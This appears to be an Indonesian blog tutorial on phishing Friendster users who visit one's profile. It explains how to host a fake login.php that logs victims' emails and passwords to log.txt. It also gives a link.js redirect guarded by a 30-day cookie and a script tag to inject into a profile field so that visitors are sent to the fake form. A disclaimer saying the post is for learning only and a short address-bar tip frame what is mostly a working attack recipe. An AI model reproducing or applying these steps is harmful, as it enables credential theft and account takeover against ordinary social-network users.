Kita bisa mendapatkan password profile friendster orang lain yang berkunjung ke profile FS kita dan menunggu kelalaian user tersebut atau user tersebut tidak mengetahui (baca: "Tidak Mau Tahu") dengan bahayanya memasukkan password ke dalam form login. Dengan memberikan form login palsu kepada user yang berkunjung ke profile friendster kita, user tersebut akan memasukkan e-mail dan password nya untuk login, kemudian script yang berada di dalam form login tersebut akan mendirect-nya ke profile FS kita.
Tulisan ini ditulis sekedar hanya untuk mengetahui dan pembelajaran bagi kita, bukan untuk dekstrusif atau merugikan orang lain. Tergantung bagaimana cara kita menyikapinya. Dengan mengetahui bagaimana cara kerja script ini, tentunya kita akan lebih menjadi tahu dan berhati-hati ketika memasukkan password dan e-mail kita untuk login ke Friendster.
Hal pertama yang kita butuhkan adalah sebuah account Friendster yang nantinya akan kita jadikan sebagai profile palsu yang disisipkan script dengan form login palsu. Kemudian kita juga membutuhkan tempat hosting yang support php untuk meletakkan script ini, jika kamu belum begitu memahami bagaimana mendapatkan hosting dan meletakkan script silahkan baca "Membuat Linker Untuk Friendster".
Hal berikutnya yang kita butuhkan adalah sebuah script login palsu sebagai sarana tempat user memasukkan e-mail dan passwordnya berikut file log.txt yang diletakkan dalam satu folder dengan file login.php di host, file log.txt ini adalah tempat menampung catatan e-mail dan pass yang dimasukkan oleh user tersebut. File "login.php" dan "Log.txt" bisa kamu download di sini:
http://www.geocities.com/matcode_te/blogfile/login.zip
http://www.geocities.com/matcode_te/blogfile/login.zip
Buka file "login.php" dengan notepad kamu dan cari tulisan:
http://profiles.friendster.com/???????
ganti char tanda tanya tersebut dengan ID profile fs kamu, sebagai contoh :
http://www.friendster.com/34835849
Bagaimana cara mengetahui ID friendster milik kita? Buka profile friendster kamu kemudian download page tersebut, buka dengan notepad file yang di download tadi dan cari tulisan "var pageOwnerID =" atau "var pageViewerID =", angka setelah tulisan tersebut adalah ID kamu. "var pageOwnerID =" adalah ID pemilik profile dan "var pageViewerID =" adalah ID yang melihat profile. Atau dengan cara menekan tombol "ctrl+u" (pengguna mozilla) di halaman profile kamu dan carilah tulisan seperti tersebut diatas. Jika kamu menggunakan IE, cara melihatnya bisa dengan memilih menu "view" pada menubar dan pilihlah "Source". Terserah bagaimana caranya :D
Ingat, kamu cukup mengedit ID profile nya saja, dikhawatirkan script login.php tidak akan berfungsi. Untuk mengeditnya lebih dalam downloadlah "notepad++", cari di google dengan keyword "notepad++" software ini gratis dan open source. Untuk file "log.txt" biarkan saja kosong.
Jika telah selesai upload lah file "login.php" dan "log.txt" ke hostingan kamu.
Selanjutnya yang kita butuhkan adalah file link.js, file ini berfungsi sebagai penghubung antara profile fs kamu dengan file login.php serta memberikan cookies terhadap user tersebut (memberikan tanda) bahwa user tersebut telah pernah login dengan script ini, jika telah melewati 30 hari maka cookies akan expire. Salin source code berikut ini di notepad kamu dan simpan dengan nama "link.js".
http://www.geocities.com/matcode_te/blogfile/link.js
Edit file link.js yang baru saja kamu bentuk, cari tulisan ini:
if (readCookie('logged') != 1) {
parent.document.location = 'http://HOST-KAMU/login.php';
}
Ganti tulisan yang berwarna merah tersebut dengan link host kamu atau dimana tempat kamu meletakkan file login.php
Setelah file "link.js" ini kamu edit, upload ke host kamu dan ingat path addressnya. Buka profile friendster, pilihlah Menu "edit profile", pada kolom "Who I Want To Meet" Isikan code berikut ini :
<script src="http://PATH-ADDRESS-LINK.JS-KAMU"></script>
Ganti tulisan yang berwarna merah tersebut dengan path address "link.js" kamu.
Untuk uji coba, silahkan kamu pakai profile friendster kamu yang sesungguhnya, kemudian buka profile fs ini, jika kamu mengisinya dengan benar, tentu saja login palsu ini akan muncul dan meminta kamu untuk login. Jika kamu telah login menggunakan login palsu ini, maka untuk kedua kali nya tidak akan dimunculkan sampai 30 hari, kecuali jika kamu menghapus cookies browser.
Yang membuatnya berbeda dengan login asli friendster adalah addressnya, jika muncul form login, perhatikan adress bar nya, jika addressbar nya adalah http://friendster.com/***** maka dapat dipastikan login ini adalah asli, jika tidak maka kemungkinan besar form login ini adalah palsu.
Untuk mengcounter-nya coba anda tes terlebih dahulu dengan mengisi sembarang e-mail dan sembarang pass sebelum kamu mengisinya dengan e-mail dan pass kamu yang sesungguhnya, dan juga perhatikan address bar nya, apakah login ini benar-benar dari friendster.com atau bukan.
Sebagai profile contoh untuk tulisan ini silahkan kunjungi profile frienster berikut ini :
http://www.friendster.com/77178685
Mohon jangan disalah artikan, tulisan ini merupakan langkah bagi kita untuk maju bersama, untuk kedepannya kita lebih berhati-hati dalam melakukan login di frienster.
Selamat Berjuang.
Tidak ada komentar:
Posting Komentar